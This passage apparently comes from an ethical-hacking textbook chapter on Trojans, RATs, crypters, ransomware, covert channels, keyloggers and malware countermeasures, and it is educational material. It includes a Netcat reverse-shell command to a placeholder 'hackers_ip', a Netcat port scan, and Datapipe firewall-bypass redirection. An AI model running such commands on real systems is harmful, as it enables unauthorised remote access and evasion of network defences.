  • Denial of Service (DoS): These Trojans are designed to cause a DoS. They can be designed to knock out a specific service or to bring an entire system offline.

  • Proxy: These Trojans are designed to work as proxies. These programs can help a hacker hide and allow him to perform activities from the victim’s computer, not his own. After all, the farther away the hacker is from the crime, the harder it becomes to trace.

  • FTP: These Trojans are specifically designed to work on port 21. They allow the hacker or others to upload, download, or move files at will on the victim’s machine.

  • Security-software disablers: These Trojans are designed to attack and kill antivirus or software firewalls. The goal of disabling these programs is to make it easier for the hacker to control the system.

Note

Sality is a type of security disabler malware. Even though it has been around since 2003, it continues to be seen in the wild. Sality utilizes polymorphic and entrypoint obscuring (EPO) techniques to infect Windows systems. Once infected it will disable antivirus and the firewall.

Trojan Ports and Communication Methods

Trojans can communicate in several ways. Some use overt communications. These programs make no attempt to hide the transmission of data as it is moved on to or off of the victim’s computer. Most use covert communication channels. This means that the hacker goes to lengths to hide the transmission of data to and from the victim. Many Trojans that open covert channels also function as backdoors. A backdoor is any type of program that will allow a hacker to connect to a computer without going through the normal authentication process. If a hacker can get a backdoor program loaded on an internal device, the hacker can then come and go at will. Some of the programs spawn a connection on the victim’s computer connecting out to the hacker. The danger of this type of attack is the traffic moving from the inside out, which means from inside the organization to the outside Internet. This is usually the least restrictive because companies are usually more concerned about what comes in the network than they are about what leaves the network.

Tip

One way an attacker can spread a Trojan is through a poison apple attack. Using this technique, the attacker leaves a thumb drive in the desk drawer of the victim or maybe in the cafeteria of the targeted company. The attacker then waits for someone to find it, insert it in the computer, and start clicking on files to see what’s there. Instead of just one bite of the apple, it’s just one click, and the damage is done!

Trojan Goals

Not all Trojans were designed for the same purpose. Some are destructive and can destroy computer systems, whereas others seek only to steal specific pieces of information. Although not all of them make their presence known, Trojans are still dangerous because they represent a loss of confidentiality, integrity, and availability. Common goals of Trojans include the following:

  • Credit card data: Credit card data and banking information have become huge targets. After the hacker has this information, he can go on an online shopping spree or use the card to purchase services, such as domain name registration.

  • Electronic or Digital Wallets: Individuals can use an electronic device or online service that allows them to make electronic transactions. This includes buying goods online or using a smartphone to purchase something at a store. A digital wallet can also be a crypto currency wallet (such as Bitcoin, Ethereum, Litecoin, Ripple, etc.).

  • Passwords: Passwords are always a big target. Many of us are guilty of password reuse. Even if we are not, there is always the danger that a hacker can extract email passwords or other online account passwords.

  • Insider information: We have all had those moments in which we have said, “If only I had known this beforehand.” That’s what insider information is about. It can give the hacker critical information before it is made public or released.

  • Data storage: The goal of the Trojan might be nothing more than to use your system for storage space. That data could be movies, music, illegal software (warez), or even pornography.

  • Advanced persistent threat (APT): It could be that the hacker has targeted you as part of a nation-state attack or your company has been targeted because of its sensitive data. Two examples include Stuxnet and the APT attack against RSA in 2011. These attackers may spend significant time and expense to gain access to critical and sensitive resources.

Trojan Infection Mechanisms

Image

After a hacker has written a Trojan, he will still need to spread it. The Internet has made this much easier than it used to be. There are a variety of ways to spread malware, including the following:

  • Peer-to-peer networks (P2P): Although users might think that they are getting the latest copy of a computer game or the Microsoft Office package, in reality, they might be getting much more. P2P networks and file-sharing sites such as The Pirate Bay are generally unmonitored and allow anyone to spread any programs they want, legitimate or not.

  • Instant messaging (IM): IM was not built with security controls. So, you never know the real contents of a file or program that someone has sent you. IM users are at great risk of becoming targets for Trojans and other types of malware.

  • Internet Relay Chat (IRC): IRC is full of individuals ready to attack the newbies who are enticed into downloading a free program or application.

  • Email attachments: Attachments are another common way to spread a Trojan. To get you to open them, these hackers might disguise the message to appear to be from a legitimate organization. The message might also offer you a valuable prize, a desired piece of software, or similar enticement to pique your interest. If you feel that you must investigate these attachments, save them first and then run an antivirus on them. Email attachments are the number one means of malware propagation. You might investigate them as part of your information security job to protect network users.

  • Physical access: If a hacker has physical access to a victim’s system, he can just copy the Trojan horse to the hard drive (via a thumb drive). The hacker can even take the attack to the next level by creating a Trojan that is unique to the system or network. It might be a fake login screen that looks like the real one or even a fake database.

  • Browser and browser extension vulnerabilities: Many users don’t update their browsers as soon as updates are released. Web browsers often treat the content they receive as trusted. The truth is that nothing in a web page can be trusted to follow any guidelines. A website can send to your browser data that exploits a bug in a browser, violates computer security, and might load a Trojan.

  • SMS messages: SMS messages have been used by attackers to propagate malware to mobile devices and to perform other scams.

  • Impersonated mobile apps: Attackers can impersonate apps in mobile stores (for example, Google Play or Apple Store) to infect users. Attackers can perform visual impersonation to intentionally misrepresents apps in the eyes of the user. Attackers can do this to repackage the application and republish the app to the marketplace under a different author. This tactic has been used by attackers to take a paid app and republish it to the marketplace for less than its original price. However, in the context of mobile malware, the attacker uses similar tactics to distribute a malicious app to a wide user audience while minimizing the invested effort. If the attacker repackages a popular app and appends malware to it, the attacker can leverage the user’s trust of their favorite apps and successfully compromise the mobile device.

  • Watering hole: The idea is to infect a website the attacker knows the victim will visit. Then the attacker simply waits for the victim to visit the watering hole site so the system can become infected.

  • Freeware: Nothing in life is free, and that includes most software. Users are taking a big risk when they download freeware from an unknown source. Not only might the freeware contain a Trojan, but freeware also has become a favorite target for adware and spyware.

Tip

Be sure that you understand that email is one of the most widely used forms of malware propagation.

Effects of Trojans

The effects of Trojans can range from the benign to the extreme. Individuals whose systems become infected might never even know; most of the creators of this category of malware don’t want to be detected, so they go to great lengths to hide their activity and keep their actions hidden. After all, their goal is typically to “own the box.” If the victim becomes aware of the Trojan’s presence, the victim will take countermeasures that threaten the attacker’s ability to keep control of the computer. In some cases, programs seemingly open by themselves or the web browser opens pages the user didn’t request. However, because the hacker is in control of the computer, he can change its background, reboot the systems, or capture everything the victim types on the keyboard.

Trojan Tools

Image

Now that you have a little background on Trojans, their means of transmission, and their purpose, it is time to take a look at some well-known Trojan tools.

Tini is a small backdoor Trojan that is about 3 KB. Tini was written for Windows and listens at TCP port 7777 and gives anybody who connects a remote command prompt. It can be downloaded at http://www.ntsecurity.nu/toolbox/tini. The disadvantage to the hacker is that the tool always listens on port 7777. Because the port cannot be changed, it is easy for a penetration tester to scan for and find this open port.

BlackHole RAT is an example of a remote-access Trojan. RATs provide the attacker with remote administrative control over the victim’s computer. RATs are usually executed invisibly when an infected attachment such as a .pdf, .ppt, .doc, or .xls document is opened.

RATs usually have two components: a server and a client. The server executable runs on the victim’s computer, and the client application runs on the hacker’s computer. After a RAT has been installed on a victim’s computer, it opens a predefined port on the victim’s computer. That port is used to connect to the client software that the hacker runs.

NetBus was one of the first RATs. While rather dated by today’s standards, it is listed here to prove a point. All RATs are used to accomplish the same task. Numerous other RATs and Trojans have emerged in recent years, including popular RATs such as Poison Ivy (also known as Darkmoon), Shady Rat, and the IcedID and Metamorfo banking trojans. These RATs enable an attacker to control the victim’s computer and perform a host of activities. The RAT gives the attacker access to the local file system, as well as the ability to browse, create, and remove directories, and even edit the Registry. It is usually installed by some form of trickery or by sending it as an email attachment. Some versions can hide themselves in an alternate data stream. Once installed, the program will also embed itself in the Registry so that it will restart upon reboot. Hackers can connect to servers through the client GUI that offers encryption. A complete list of commands appears in the readme file that accompanies the Trojan.

The Gh0st RAT Trojan (also known as Moudoor) was designed to turn on the webcam, record audio, and enable built-in internal microphones to spy on people. This Trojan was delivered by PDF and was deployed on more than 1,000 computers.

The following are additional examples of RATs:

  • BlackHole RAT: Used by attackers to compromise Mac OS X or Windows to execute shell commands, shut down or restart the system, display messages in the victim’s system, and even prompt the user to enter admin credentials.

  • HydraQ: HydraQ is also known as 9002 RAT, McRAT, and Naid, and is used by Group72 (a well-organized hacking group) to compromise numerous systems.

  • Hikit: Hikit is also known as Matrix RAT and Gaolmay. Hikit was also used by Group72.

  • Let Me Rule: This RAT was written in Delphi and uses TCP port 26097 by default.

  • Jumper: This works on Windows computers, and it features RC4 encryption, code injection, and encrypted communication.

  • Phatbot: This is a variant of Agobot, a big family of IRC bots. This Trojan can steal personal information, such as email addresses, credit card numbers, and software licensing codes. Rather than sending this information from one email address to an IRC channel, it forwards the information using a P2P network. Phatbot can also kill many antivirus or software firewall products, which makes victims susceptible to secondary attacks.

  • Amitis: This Trojan opens a TCP port and gives the hacker complete control of the victim’s computer.

  • Zombam.B: This Trojan enables its hacker to use a web browser to access your computer. It opens port 80 by default and was written with a Trojan-generation tool, HTTPRat. It also attempts to terminate various antivirus and firewall processes.

  • Beast: This is one of the first Trojans to use DLL injection and reverse connections to its victims. This means that it actually injects itself into an existing process. It is not visible with traditional process viewers, can be harder to detect, and can be harder to unload. Its default port is TCP 6666.

  • MoSucker: This is a Visual Basic Trojan. MoSucker gives the hacker access to the local file system, as well as the ability to browse, create, and remove directories, and even edit the Registry.

Note

Trojans are not written just for Microsoft systems. As Apple products have become more popular, hackers have started developing Trojans for the OS X platform, such as DNSChanger and Hell Raiser.

Keep in mind that Trojans can be used for more than just providing remote access. Trojan tools such as WinVNC and VNC Stealer provide access over a VNC connection, whereas some provide access via FTP, ICMP, or even HTTP access.

Distributing Trojans

Just think about it: Distributing Trojans is no easy task. Because users are somewhat more alert, less willing to click email attachments, and more likely to be running antivirus, the attacker must use new techniques to distribute the Trojan. On Windows computers, it used to be enough for the hacker to just include a lot of spaces between the program’s name and suffix, such as important_message_text.txt.exe, or the hacker could choose program suffixes or names from those programs that would normally be installed and running on the victim’s machine, such as Notepad.exe. The problem is that the users’ and administrators’ levels of awareness about these techniques are greater than they used to be.

Currently, attackers are more likely to target social networking sites or even use social engineering to aid in the deployment of the Trojan. Although most attacks are highly technical, there may also be a social component that is used to trick the user into installing or executing malware. As an example, the attacker may try to redirect you to a tiny URL, such as https://tinyurl.com/y9amaaq4.

Technology changes, and that includes malware distribution. Although the ability of antivirus to detect malware has improved, so has the ability to hide malware. The fact is that malware detection is much more difficult today than in the past. Today, it is not uncommon for attackers to use multiple layers of techniques to obfuscate code, make malicious code undetectable from antivirus, and employ encryption to prevent others from examining malware. The result is that modern malware improves the attackers’ chances of compromising a computer without being detected. These techniques include wrappers, droppers, packers, and crypters.

Wrappers

Image

Wrappers offer hackers a method to slip past a user’s normal defenses. A wrapper is a program used to combine two or more executables into a single packaged program. Wrappers are also referred to as binders, packagers, and EXE binders because they are the functional equivalent of binders for Windows Portable Executable files. Some wrappers only allow programs to be joined; others allow the binding together of three, four, five, or more programs. Basically, these programs perform like installation builders and setup programs. Besides allowing you to bind a program, wrappers add additional layers of obfuscation and encryption around the target file, essentially creating a new executable file.

A good example of a wrapper is BurnEye. It was created by TESO, a hacker group that originated in Austria and was active in the late 1990s and early 2000s. TESO’s BurnEye was designed to protect ELF binaries on the Intel x86 Linux operating system. You can find a copy of BurnEye at http://packetstormsecurity.com/groups/teso/. BurnEye uses three layers of protection:

  • Obfuscation layer: Scrambles the contents of the binary executable file

  • Password layer: Allows the user to encrypt the target binary

  • Fingerprinting layer: Allows targeting so that the malware will execute only in an environment matching specific criteria

Figure 5-12 shows an example of how a wrapper binds two programs together.

A block diagram depicts the working of the wrapper tool.

Figure 5-12 How Wrappers Work

Packers

Image

Packers are similar to programs such as WinZip, Rar, and Tar because they compress files. However, whereas compression programs compress files to save space, packers do this to obfuscate the activity of the malware. The idea is to prevent anyone from viewing the malware’s code until it is placed in memory. Packers serve a second valuable goal to the attacker in that they work to bypass network security protection mechanisms, such as host- and network-based intrusion detection systems (HIDSs and NIDSs, discussed in Chapter 9, “IDS, Firewalls, and Honeypots”). The malware packer will decompress the program only when in memory, revealing the program’s original code only when executed. This is yet another attempt to bypass antimalware detection.

Droppers

Image

Droppers are software designed to install malware payloads on the victim’s system. Droppers try to avoid detection and evade security controls by using several methods to spread and install the malware payload. The following are a few examples of Trojan-dropper tools:

  • Win32/Rotbrow.A

  • Win32/Meredrop

  • Win32/Swinsyn

  • Win32/Destover-C

Crypters

Image

Crypters function to encrypt or obscure the code. Some crypters obscure the contents of the Trojan by applying an encryption algorithm. Crypters can use anything from AES, RSA, to even Blowfish, or might use more basic obfuscation techniques such as XOR, Base64 encoding, or even ROT13. Again, these techniques are used to conceal the contents of the executable program, making it undetectable by antivirus and resistant to reverse-engineering efforts.

Some examples of these types of programs are listed here. These and other programs are available to the hacker underground, and a quick search on the Web will reveal a wide variety.

  • Morphine: Morphine is a simple packer/crypter that can be used to obscure malware.

  • Yoda’s Crypter: A free and small crypter with some nice protection options, Yoda’s Crypter comes with several protection options, such as polymorphic encryption and anti-debug.

  • Trojan Man: This wrapper combines two programs and can also encrypt the resulting package in an attempt to foil antivirus programs.

  • CypherX Crypter: This program enables you to crypt and bind any file, including Trojans, RATs, and malware.

  • Teflon Oil Patch: This is another program used to bind Trojans to any files you specify in an attempt to defeat Trojan detection programs.

  • Restorator: Although Restorator is not designed as a hacking tool, you can use it to modify, add, and remove resources such as text, images, icons, sounds, videos, version, dialogs, and menus in almost all programs. It can be used to add a Trojan to a package, such as a screensaver, before it is forwarded to the victim.

  • Pretty Good Malware Protection (PGMP): This tool allows you to take even a known sample of malware that would likely be detected by antivirus engines and repack the code with a very high level of encryption to prevent antivirus or other programs from detecting the malware.

It’s important to keep in mind that crypters are just part of the process. The steps to successfully deploy a Trojan are illustrated in Figure 5-13.

A flow diagram shows the steps to deploy a Trojan.

Figure 5-13 Steps to Deploy a Trojan

Note

Whereas Trojans used to be widely transmitted, today’s malware creators focus on much more targeted attacks, sometimes limiting a specific Trojan to be deployed to only a few victims. This technique makes detection and eradication much more difficult.

Ransomware

Image

Over the past few years, ransomware has been used by criminals making money out of their victims and by hacktivists and nation-state attackers causing disruption. Ransomware can propagate like a worm or a virus but is designed to encrypt personal files on the victim’s hard drive until a ransom is paid to the attacker. Ransomware has been around for many years but made a comeback in recent years. The following are several examples of popular ransomware:

  • WannaCry

  • Pyeta

  • Nyeta

  • Bad Rabbit

  • Grandcrab

  • SamSam

  • CryptoLocker

  • CryptoDefense

  • CryptoWall

  • Spora

Ransomware can encrypt specific files in your system or all your files, in some cases including the master boot record of your hard disk drive.

Figure 5-14 shows an example of the WannaCry ransomware dialog box shown to the victim user.

A screenshot of WannaCry Ransomware Dialog Box is shown.

Figure 5-14 WannaCry Ransomware Dialog Box

Covert Communications

Distributing a Trojan is just half the battle for the attacker. The attacker will need to have some way to exfiltrate data and to do so in a way that is not detected. If you look at the history of covert communications, you will see that the Trusted Computer System Evaluation Criteria (TCSEC) was one of the first documents to fully examine the concept of covert communications and attacks. TCSEC divides covert channel attacks into two broad categories:

  • Covert timing channel attacks: Timing attacks are difficult to detect because they are based on system times and function by altering a component or by modifying resource timing.

  • Covert storage channel attacks: Use one process to write data to a storage area and another process to read the data.

It is important to examine covert communications on a more focused scale because it will be examined here as a means of secretly passing information or data. For example, most everyone has seen a movie in which an informant signals the police that it’s time to bust the criminals. It could be that the informant lights a cigarette or simply tilts his hat. These small signals are meaningless to the average person who might be nearby, but for those who know what to look for, they are recognized as a legitimate signal.

In the world of hacking, covert communication is accomplished through a covert channel. A covert channel is a way of moving information through a communication channel or protocol in a manner in which it was not intended to be used. Covert channels are important for security professionals to understand. For the ethical hacker who performs attack and penetration assessments, such tools are important because hackers can use them to obtain an initial foothold into an otherwise secure network. For the network administrator, understanding how these tools work and their fingerprints can help her recognize potential entry points into the network. For the hacker, these are powerful tools that can potentially allow him control and access.

How do covert communications work? Well, the design of TCP/IP offers many opportunities for misuse. The primary protocols for covert communications include Internet Protocol (IP), Transmission Control Protocol (TCP), User Datagram Protocol (UDP), Internet Control Message Protocol (ICMP), and Domain Name Service (DNS).

Tunneling via the Internet Layer

The Internet layer offers several opportunities for hackers to tunnel traffic. Two commonly tunneled protocols are IPv6 and ICMP.

IPv6 is like all protocols in that it can be abused or manipulated to act as a covert channel. This is primarily possible because edge devices may not be configured to recognize IPv6 traffic even though most operating systems have support for IPv6 turned on. According to US-CERT, Windows misuse relies on several factors:

  • Incomplete or inconsistent support for IPv6

  • The IPv6 auto-configuration capability

  • Malware designed to enable IPv6 support on susceptible hosts

  • Malicious application of traffic “tunneling,” a method of Internet data transmission in which the public Internet is used to relay private network data

There are plenty of tools to tunnel over IPv6, including 6tunnel, socat, nt6tunnel, and relay6. The best way to maintain security with IPv6 is to recognize that even devices supporting IPv6 may not be able to correctly analyze the IPv6 encapsulation of IPv4 packets.

The second protocol that might be tunneled at the Internet layer is Internet Control Message Protocol (ICMP). ICMP is specified by RFC 792 and is designed to provide error messaging, best path information, and diagnostic messages. One example of this is the ping command. It uses ICMP to test an Internet connection. Figure 5-15 details the packet format of the ICMP header.

A figure shows the packet format of the ICMP header. The packet has three rows, where the first row has three divisions such as type, code, and checksum. The second row has two divisions denoting identifier and sequence number. The third row denotes optional data.

Figure 5-15 ICMP Header

As you can see in Figure 5-15, the fields of the ping packet include the following:

  • Type: Set to 8 for the request and 0 for the reply.

  • Code: Set to 0.

  • Identifier: A 2-byte field that stores a number generated by the sender that is used to match the ICMP Echo with its corresponding Echo Reply.

  • Sequence Number: A 2-byte field that stores an additional number that is used to match the ICMP Echo with its corresponding Echo Reply. The combination of the values of the Identifier and Sequence Number fields identifies a specific Echo message.

  • Optional Data: Optional data.

Did you notice the comments about the last field, Optional Data? What’s transported there depends on the system. Linux fills the Optional Data area with numeric values by counting up, whereas a Windows system progresses through the alphabet. The Optional Data field was designed just to be filler. It helps meet the minimum packet size needed to be a legal packet. It’s sort of like those Styrofoam peanuts in a shipping box; it’s just there to take up space.

Let’s take a look at some basic ways that ping can be manipulated before discussing specific covert communication tools. The Linux ping command includes the -p option, which allows the user to specify the optional data. Therefore, a user could enter just about anything he wanted into the field. In Figure 5-16, the hex string deadbeef is used.

The screenshot of the Linux root@kali window shows the execution of ping command and hex string deadbeaf.

Figure 5-16 Embedding Payloads in ICMP Packets

Figure 5-17 shows the Wireshark packet capture program where you can see the contents of the ICMP packet (ping packet).

A screenshot shows the output screen of the Wireshark ping capture program.

Figure 5-17 Wireshark Ping Capture

You can clearly see how ICMP can be used to transport other types of data. Examples of ICMP tunneling tools include the following:

  • ICMP backdoor: An ICMP backdoor program has the advantage of using only ping reply packets. Because it does not pad up short messages or divide large messages, some IDSs can easily detect that the traffic is not composed of actual ICMP packets. A similar tool is Loki.

  • 007Shell: This is an ICMP covert communication program that takes the extra step of rounding out each packet to ensure that it has 64 bytes of data so that it appears as a normal ping packet.

  • ICMPSend: This is an ICMP covert communication program that uses ping packets to covertly exfiltrate data.

Tunneling via the Transport Layer

The transport layer offers attackers two protocols to use: TCP and UDP. TCP offers several fields that can be manipulated by an attacker, including the TCP Options field in the TCP header and the TCP Flag field. By design, TCP is a connection-oriented protocol that provides robust communication. The following steps outline the process:

  1. A three-step handshake: This ensures that both systems are ready to communicate.

  2. Exchange of control information: During the setup, information is exchanged that specifies maximum segment size.

  3. Sequence numbers: This indicates the amount and position of data being sent.

  4. Acknowledgments: This indicates the next byte of data that is expected.

  5. Four-step shutdown: This is a formal process of ending the session that allows for an orderly shutdown.

Although SYN packets occur only at the beginning of the session, ACKs may occur thousands of times. They confirm that data was received, as shown in Figure 5-18.

A figure shows the TCP ACK process between the client and the server. The client sends the sequence number x plus 1 to the server. The server sends the acknowledge number x plus 2 back to the client.

Figure 5-18 TCP ACK Process

That is why packet-filtering devices build their rules on SYN segments. It is an assumption on the firewall administrator’s part that ACKs occur only as part of an established session. It is much easier to configure, and it reduces workload. To bypass the SYN blocking rule, a hacker may attempt to use TCP ACK packets as a covert communication channel. Tools such as AckCmd serve this exact purpose.

UDP is stateless and, as such, may not be logged in firewall connections; some UDP-based applications such as DNS are typically allowed through the firewall and may not be watched closely by network and firewall administrators. UDP tunneling applications typically act in a client/server configuration. Also, some ports like UDP 53 are most likely open. This means it’s also open for attackers to use as a potential means to exfiltrate data. There are several UDP tunnel tools that you should check out, including the following:

Tunneling via the Application Layer

Application layer tunneling uses common applications that send data on allowed ports. For example, a hacker may tunnel a web session, port 80, through SSH port 22 or even through port 443. Because ports 22 and 443 both use encryption, it can be difficult to monitor the difference between a legitimate session and a covert channel.

HTTP might also be used. Netcat is one tool that can be used to set up a tunnel to exfiltrate data over HTTP. If HTTPS is the transport, it is difficult for the network administrator to inspect the outbound data. Cryptcat (http://cryptcat.sourceforge.net) can be used to send data over HTTPS.

Finally, even Domain Name System (DNS) can be used for application layer tunneling. DNS is a request/reply protocol. Its queries consist of a 12-byte fixed-size header followed by one or more questions. A DNS response is formatted in much the same way in that it has a header, followed by the original question, and then typically a single-answer resource record. The most straightforward way to manipulate DNS is by means of these request/replies. While a spike in DNS traffic may be detected, it is still a potential way for an attacker to move data.

To recap, there are numerous covert communication tools. No matter which tool the hacker uses, the key is not to be detected. The following lists some of these tools:

  • Loki: A proof-of-concept tool designed to show how ICMP traffic can be unsecure and dangerous. The tool is named after the Norse god of deceit and trickery. Loki was not designed to be a compromise tool. Its purpose is that of a backdoor or covert channel, because it provides a method to move information covertly from one system to another. Even though it is a covert channel, it is not encrypted. Depending on the commands executed by the hacker, there will probably be many more ICMP requests than replies. Normally, there should be one ping reply for each ping request. Anyone noticing an abundance of ICMP packets can detect its presence, or a sniffer or IDS can be used to note that the ICMP sequence number is always static. Blocking ICMP at the firewall will prevent Loki from using ICMP.

  • ICMP backdoor: Unlike Loki, the ICMP backdoor program has the advantage of using only ping reply packets. Because it doesn’t pad up short messages or divided large messages, some IDSs can easily detect that the traffic is not composed of actual ICMP packets.

  • 007Shell: This is another ICMP covert communication program that takes the extra step of rounding out each packet to ensure that it has 64 bytes of data, so it appears as a normal ping packet.

  • ICMPSend: This covert channel program is yet another ICMP covert communication program that uses ping packets to covertly exfiltrate data.

  • Reverse WWW Tunneling Shell: This covert channel program is a proof-of-concept Perl program developed for the paper “Placing Backdoors Through Firewalls.” It allows communicating with a shell through firewalls and proxy servers by imitating web traffic. The program is run on the victim’s computer at a preset time every day. The internal server will attempt to contact the external client to pick up commands. The program uses HTTP and resembles a normal internal device requesting content from a web server.

  • AckCmd: AckCmd is a covert channel program that provides a command shell on Windows systems. It communicates using only TCP ACK segments. This way, the client component is capable of directly contacting the server component through routers with ACLs in place to block traffic.

Port Redirection

Image

The previous section discussed tools and techniques for data exfiltration. Another useful technique is port redirection. Port redirection works by listening on certain ports and then forwarding the packets to a secondary target. Some of the tools used for port redirection include Netcat, Datapipe, and FPipe. What is great about all three of these tools is that they are protocol ignorant. They don’t care what you pass; port redirectors simply act as the pipe to move data from point A to point B.

Netcat is a command-line utility written for UNIX and Windows. Netcat can build and use TCP and UDP connections. It is useful for port redirection as well as numerous other tasks. It reads and writes data over those connections until they are closed. Table 5-2 shows common Netcat switches.

Table 5-2 Common Netcat Switches

Netcat Switch

Purpose

nc -d

Used to detach Netcat from the console.

nc -l -p [port]

Used to create a simple listening TCP port. Adding -u will place it into UDP mode.

nc -e [program]

Used to redirect stdin/stdout from a program to Netcat.

nc -w [timeout]

Used to set a timeout before Netcat automatically quits.

Program 1 nc

Used to pipe output of program to Netcat.

nc 1 program

Used to pipe output of Netcat to program.

nc -h

Used to display help options.

nc -v

Used to put Netcat into verbose mode.

nc -g or nc -G

Used to specify source routing flags. -g is gateway source routing, -G is numeric source routing.

nc -t

Used for Telnet negotiation DON’T and WON’T.

nc -o [file]

Used to hex dump traffic to file.

nc -z

Used for port scanning.

If Netcat is available on the victim’s system, it can be used to shovel the shell directly back to the hacker system. First, the hacker would need to set up a listener on his system, as follows:

nc -n -v -l -p 80

Next, the hacker enters the following command from the victim’s system:

nc -n hackers_ip 80 -e "cmd.exe"

After being entered, this would shovel the shell for the victim’s system to the hacker’s open command prompt. Netcat can be used for many other purposes, such as port scanning and uploading files. To port scan, use this command:

nc -v -z -w1 IPaddress 1-1024

This command port scans the target IP address. The -v option means verbose, -z is used for port scanning, -w1 means wait one second before timing out, and 1-1024 is the range of TCP ports to be scanned.

Datapipe is a Linux, FreeBSD, and Windows port redirection tool. The syntax to use Datapipe is straightforward:

datapipe <localport> <remoteport> <remotehost>

As an example, suppose that the hacker has compromised a Linux host 10.2.2.254 on the inside of the network and has uploaded the Datapipe application. Now, the hacker would like to set up a null session to Windows systems (10.2.2.2) inside the compromised network. The problem is that the firewall is blocking port 139. Therefore, there is no direct way for the hacker to set up a null session. That’s where Datapipe comes in. From the compromised Linux system, the hacker runs the following command:

datapipe 80 139 10.2.2.2

On the hacker’s local Linux system, he enters the following:

datapipe 139 80 10.2.2.254

To review what has happened here, the compromised Linux system was instructed to take traffic coming from the target Windows system and use port redirection to move port 139 traffic over to port 80. After the traffic is on port 80, it can easily be moved through the corporate firewall. On the hacker’s local system, Datapipe was instructed to take traffic on port 80 and use port redirection to move it back over to 139. At this point, a null session can be set up using the traffic being redirected out of the firewall.

FPipe is a similar tool that was developed by Foundstone. It performs port redirection on Windows systems. Again, this tool allows hackers to bypass firewall restrictions.

Keystroke Logging and Spyware

Image

Keystroke loggers (keyloggers) are software or hardware devices used to record everything a person types. Some of these programs can record every time a mouse is clicked, a website is visited, and a program is opened. Although not truly a covert communication tool, these devices do enable a hacker to covertly monitor everything a user does. Some of these devices secretly email all the amassed information to a predefined email address set up by the hacker.

The software version of this device is basically a shim, as it sits between the operating system and the keyboard. The hacker might send a victim a keystroke logging program wrapped up in much the same way as a Trojan would be delivered. Once installed, the logger can operate in stealth mode, which means that it is hard to detect unless you know what you are looking for.

There are ways to make keyloggers completely invisible to the OS and to those examining the file system. To accomplish this, all the hacker has to do is use a hardware keylogger. These devices are usually installed while the user is away from his desk. Hardware keyloggers are completely undetectable except for their physical presence. Even then, they might be overlooked because they resemble an extension. Not many people pay close attention to the plugs on the back of their computer.

To stay on the right side of the law, employers who plan to use keyloggers should make sure that company policy outlines their use and how employees are to be informed. The CERT Division of the Software Engineering Institute (SEI) recommends a warning banner similar to the following: “This system is for the use of authorized personnel only. If you continue to access this system, you are explicitly consenting to monitoring.”

Hardware Keyloggers

Image

Keystroke recorders have been around for years. Hardware keyloggers can be wireless or wired. Wireless keyloggers can communicate via 802.11 or Bluetooth, and wired keyloggers must be retrieved to access the stored data. One such example of a wired keylogger is KeyGhost, a commercial device that is openly available worldwide from a New Zealand firm that goes by the name of KeyGhost Ltd (http://www.keyghost.com). The device looks like a small adapter on the cable connecting one’s keyboard to the computer. This device requires no external power, lasts indefinitely, and cannot be detected by any software.

Software Keyloggers

Image

Numerous software products that record all keystrokes are openly available on the Internet. You have to pay for some products, but others are free. Examples of keystroke recorders include the following:

  • Spy PC Keylogger: This Windows-based software keystroke logger runs silently at the lowest level of the OS. The program is almost impossible to discover after the program file and the log file are renamed by the install utility. An exhaustive hard drive search won’t turn up anything. And the running process won’t show up anywhere.

  • Ghost Keylogger: Ghost Keylogger is a Windows-based software keylogger that records every keystroke to an encrypted log file. The log file can be sent secretly by email to a predefined address.

  • Veriato Investigator: This program captures keystroke activity and email, chat conversations, and instant messages.

  • eBLASTER: This keylogger does it all. It captures all types of activity, organizes the information, and sends detailed reports to a predefined email address at specified intervals.

Spyware

Spyware is another form of malicious code that is similar to a Trojan. It is installed without your consent or knowledge, hidden from view, monitors your computer and Internet usage, and is configured to run in the background each time the computer starts. Spyware has grown to be a big problem. It is usually used for one of two purposes: surveillance or advertising:

  • Surveillance: Used to determine your buying habits, discover your likes and dislikes, and report this demographic information to paying marketers.

  • Advertising: You’re targeted for advertising that the spyware vendor has been paid to deliver. For example, the maker of a rhinestone cell phone case might have paid the spyware vendor for 100,000 pop-up ads. If you have been infected, expect to receive more than your share of these unwanted pop-up ads.

Many times, spyware sites and vendors use droppers to covertly drop their spyware components to the victim’s computer. Basically, a dropper is just another name for a wrapper, because a dropper is a standalone program that drops different types of standalone malware to a system.

Spyware programs are similar to Trojans in that there are many ways to become infected. To force the spyware to restart each time the system boots, code is usually hidden in the Registry run keys, the Windows Startup folder, the Windows load= or run= lines found in the Win.ini file, or the Shell= line found in the Windows System.ini file. Spyware, like all malware, may also make changes to the hosts file. This is done to block the traffic to all the download or update servers of the well-known security vendors or to redirect traffic to servers of their choice by redirecting traffic to advertisement servers and replacing the advertisements with their own.

If you are dealing with systems that have had spyware installed, start by looking at the hosts file and the other locations discussed previously or use a spyware removal program. It’s good practice to use more than one antispyware program to find and remove as much spyware as possible. Well-known antispyware programs include the following:

Malware Countermeasures

Prevention is always better than a cure. Make sure that you always have the latest version of antivirus installed on systems in your care and have auto-updates enabled. Education also plays a big part in stopping malicious software. All users should be informed of the dangers of opening attachments or installing programs from unverified sources. Integrity checkers can also help point out any abnormal changes. Microsoft uses system file verification. It’s used to flag and prevent the replacement of protected file systems. Protected files are fingerprinted with a hashing algorithm. Programs such as Tripwire are also useful. Tripwire enables you to take periodic snapshots of files and then compare them to previous snapshots to verify that nothing has changed. If changes have occurred, you are prompted to investigate. Outside of these best practices, an ethical hacker should understand the various ways to detect a Trojan, including the following:

Image
  • Scan for suspicious ports

  • Scan for suspicious processes

  • Look for suspicious files and folders

  • Scan for suspicious Registry entries

  • Scan for suspicious device drivers

  • Scan for suspicious Windows services

  • Scan for suspicious startup programs

Note

Scanning for Registry changes works a bit differently from the file system change notification. It still consists of nonhooking user mode code. Even though you can detect when a change is made to a Registry key or any of its subkeys, however, you still have to figure out which key changed.

Detecting Malware

It is beyond the scope of this book to examine forensics and analysis in depth, but keep in mind that finding and assessing Trojans can require a lot of work. Consider, for example, that someone has installed a Trojan to run as C:Windows empsvchost.exe. A simple analysis of Task Manager will usually show multiple copies of svchost.exe running. You cannot rely on process name, PID, parent PID, or creation time to help indicate which svchost.exe is malicious. You would have to parse the Process Environment Block (PEB) to see the full path on disk to the process’s binary. Only then would you be able to tell whether a process is running from a nonstandard directory. The Windows kernel tracks processes by assigning them a unique EPROCESS structure that resides in a nonpaged pool of kernel memory. Gaining access to this data requires many specialized tools, including the following:

  • Process Monitor: Process Monitor can record temporal information, such as the name of the process making a change. You can also specify filters to narrow the capture criteria.

  • Task Manager: A built-in Windows application used to display detailed information about all running processes.

  • Ps: The command used to display the currently running processes on UNIX/Linux systems.

